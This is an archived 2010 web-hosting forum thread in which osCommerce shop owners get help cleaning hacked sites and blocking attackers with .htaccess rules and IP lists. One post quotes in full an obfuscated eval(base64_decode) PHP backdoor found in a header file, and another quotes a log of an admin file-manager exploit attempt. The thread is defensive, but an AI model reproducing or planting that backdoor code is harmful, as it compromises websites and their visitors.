Lary_an Posted October 9, 2010 Share Posted October 9, 2010 Hi, I have a big problem with my site - GOOGLE FLAGGED IT FOR A VIRUS. It is hosted on linux and the host does not assist in virus removal. The host suggested i download the whole site check it for viruses and upload it back up. The problem is when i do that using the latest version of NORTON i get a clean run - no viruses. I checked every single file as much as i could to see if there is an updated code and didn't find any. The only thing i see which i don't think i had before is a new folder named www with a full copy of my site which looks like is being updated as soon as i update my regular site directory. i was wondering if this can be the cause of my problems. PLEASE HELP!!!! any advice would be greatly appreciated!!!!! P.S. Just got a message from my host that www folder is a virtual folder and i shouldn't worry about it! Link to comment Share on other sites More sharing options...
♥geoffreywalton Posted October 9, 2010 Share Posted October 9, 2010 Norton does not check for malicious code in source of web pages. If you install site monitor on your site that normally shows "most" of the files that need cleansing. You could also read a few threads on hacked sites which discuss infected file in image and other directories. HTH G Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>. Link to comment Share on other sites More sharing options...
germ Posted October 9, 2010 Share Posted October 9, 2010 Hi, I have a big problem with my site - GOOGLE FLAGGED IT FOR A VIRUS. It is hosted on linux and the host does not assist in virus removal. The host suggested i download the whole site check it for viruses and upload it back up. The problem is when i do that using the latest version of NORTON i get a clean run - no viruses. I checked every single file as much as i could to see if there is an updated code and didn't find any. The only thing i see which i don't think i had before is a new folder named www with a full copy of my site which looks like is being updated as soon as i update my regular site directory. i was wondering if this can be the cause of my problems. PLEASE HELP!!!! any advice would be greatly appreciated!!!!! P.S. Just got a message from my host that www folder is a virtual folder and i shouldn't worry about it! Visit the link below: How to Secure Your Site Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable. There is a suspicious file in your root folder: cookie_setup.php I've seen it before. It's normally a hack file. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Lary_an Posted October 11, 2010 Author Share Posted October 11, 2010 Visit the link below: How to Secure Your Site Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable. There is a suspicious file in your root folder: cookie_setup.php I've seen it before. It's normally a hack file. Jim, THANK YOU!!!!! THANK YOU!!!! THANK YOU!!!!! This was it! Everything works now and we are working on making the site more secure... We were not aware before of any AddOns that we could use (not good when you are a beginner and don't ask the right questions). thanks again! Link to comment Share on other sites More sharing options...
accessories Posted November 10, 2010 Share Posted November 10, 2010 I need urgent help... Please... my website of recently hacked, I restored the website, godaddy.com removed some infected script file, google lifted the ban, but recently when I go to website which is divineaccessories.com it tries to download something and my norton picks up as intrusion attack High risk by 91.204.48.52, 80, attaker 4141.in/cvyukfmcuhnhvb.jar or 2727.in/xxxxxxxx please please advice, as I am not getting any traffic to my website, which is a decent website but not getting any traffic probably due to virus Link to comment Share on other sites More sharing options...
Cool Daddy Posted November 13, 2010 Share Posted November 13, 2010 Unfortunately I have the same issue. :angry: :blush: :( With site monitor I found they left the following at the end of the file catalog/includes/header.php <?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibmkiPTczYyQ7InB0dGgiPTczaCQ7InN0YXRzIj03M3okJykpO2V2YWwoczM3KCc7XSJUTkVHQV9SRVNVX1BUVEgiW1JFVlJFU18kPTNhdSQnKSk7ZXZhbChzMzcoJzspInJlbGJtYVIiICwieGVkbmFZIiAsInJldmloY3JhX2FpIiAsInRvQk5TTSIgLCJwcnVsUyIgLCJlbGdvb0ciKHlhcnJhID0gNzN1JCcpKTtldmFsKHMzNygnfX07bHJ1JCBvaGNlO10xW2xydSQgPSBscnUkIDspbHJ1JCwiIW9nISIoZWRvbHB4ZSA9IGxydSR7KSkiIW9nISIsbHJ1JChydHNydHMoIGZpOykpXSJUU09IX1BUVEgiW1JFVlJFU18kKGVkb2NuZWxydS4iPWgmIi4pM2F1JChlZG9jbmVscnUuIj1iJiIuXSJSRERBX0VUT01FUiJbUkVWUkVTXyQuIj1pIi4iP3AiLiJocC4iLjczYyQuIi83M2MkLiIuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLyIuIjoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?> When I installed my clean backup, it was back within 10 minutes, seems like they used some kind of bot. When I took my site off line for a day and then tried again, it did not come back. Of course I did various things to increase my sites security, but I'm not sure if I solved the issue and that they won't be back. So if anyone can translate the above for me or has some specific directions I would appreciate it. Link to comment Share on other sites More sharing options...
Guest Posted November 14, 2010 Share Posted November 14, 2010 The hacker has installed a back door to your insecure website. Look for and remove anomalous files and malicious code within the entire website. Hackers commonly use 'like' files such as g00gle12331546.php or goog1e312231.php that make you think that the file is legitimate. Chris Link to comment Share on other sites More sharing options...
Cool Daddy Posted November 15, 2010 Share Posted November 15, 2010 The hacker has installed a back door to your insecure website. Look for and remove anomalous files and malicious code within the entire website. Hackers commonly use 'like' files such as g00gle12331546.php or goog1e312231.php that make you think that the file is legitimate. Chris Yep, found some of those, and some fake php files too. Further I discovered some visits from a Russian IP 91/213/174/123 Link to comment Share on other sites More sharing options...
Wayne Weedon Posted November 15, 2010 Share Posted November 15, 2010 Yep, found some of those, and some fake php files too. Further I discovered some visits from a Russian IP 91/213/174/123 That single IP must be responsible for a lot of altered osC installations. I lost count the number of times it's been seen in my Apache logs now. Sadly Russian ISP's probably couldnt care less, so I block the whole country myself. Link to comment Share on other sites More sharing options...
timint Posted November 16, 2010 Share Posted November 16, 2010 Have you tried finding threats using my threat scanner? Some digg it, some don't. http://addons.oscommerce.com/info/7211 Link to comment Share on other sites More sharing options...
Wayne Weedon Posted November 17, 2010 Share Posted November 17, 2010 He's tried today, wondered how much longer before he'd be back. Awwww he got a 403 poor soul! 91.213.174.123 - - [17/Nov/2010:11:58:13 +0000] "POST /catalog//admin/file_manager.php/login.php?action=save HTTP/1.1" 403 1245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted November 17, 2010 Share Posted November 17, 2010 That single IP must be responsible for a lot of altered osC installations. I lost count the number of times it's been seen in my Apache logs now. Sadly Russian ISP's probably couldnt care less, so I block the whole country myself. My .htaccess file that is blocking countries is about 9mb long... Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
Wayne Weedon Posted November 17, 2010 Share Posted November 17, 2010 My .htaccess file that is blocking countries is about 9mb long... I don't go to quite that extent. Mines about 250kb with the main problematic countries in it. Another one to block as a user agent is the ZmEu script. This seems to run on either compromised servers or servers specifially set up to scan other sites for vulnerabilites. http://www.theta.tk/wiki/ZmEu Link to comment Share on other sites More sharing options...
Cool Daddy Posted November 18, 2010 Share Posted November 18, 2010 I don't go to quite that extent. Mines about 250kb with the main problematic countries in it. Another one to block as a user agent is the ZmEu script. This seems to run on either compromised servers or servers specifially set up to scan other sites for vulnerabilites. http://www.theta.tk/wiki/ZmEu Exactly how do you block the ZmEu script Wayne? Do I just need to add RewriteCond %(HTTP_USER_AGENT) ^ZmEu [OR] to my list of blocked bots? I was thinking, wouldn't it be a good idea to start a thread with an :devil: OSCOMMERCE HATE LIST? :devil: We could collect IP's of all known Oscommerce hackers and use it in the IP trap or in .htaccess. Similar for the bad bots, allthough the IPtrap has allready got a nice collection. :wub: Link to comment Share on other sites More sharing options...
Wayne Weedon Posted November 18, 2010 Share Posted November 18, 2010 Exactly how do you block the ZmEu script Wayne? Do I just need to add RewriteCond %(HTTP_USER_AGENT) ^ZmEu [OR] to my list of blocked bots? I was thinking, wouldn't it be a good idea to start a thread with an :devil: OSCOMMERCE HATE LIST? :devil: We could collect IP's of all known Oscommerce hackers and use it in the IP trap or in .htaccess. Similar for the bad bots, allthough the IPtrap has allready got a nice collection. :wub: I think I have RewriteCond %{HTTP_USER_AGENT} ^(.*)ZmEu(.*) [OR] Of course they can probably use any useragent they like, but most are basically lazy and dont bother. I think I have also seen the same thing visit as "Morpheous strikes again" Well there are certainly many IP's that seem to visit many sites again and again. It would not suprise me if they visit this forum quite a lot too! I wonder if any are registered users! Wayne.... Link to comment Share on other sites More sharing options...
Wayne Weedon Posted November 19, 2010 Share Posted November 19, 2010 Here's a few culprits anyway if you want to collate! 78.170.113.226 TR 81.214.228.61 TR 91.211.16.126 UA 91.213.174.123 RU Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.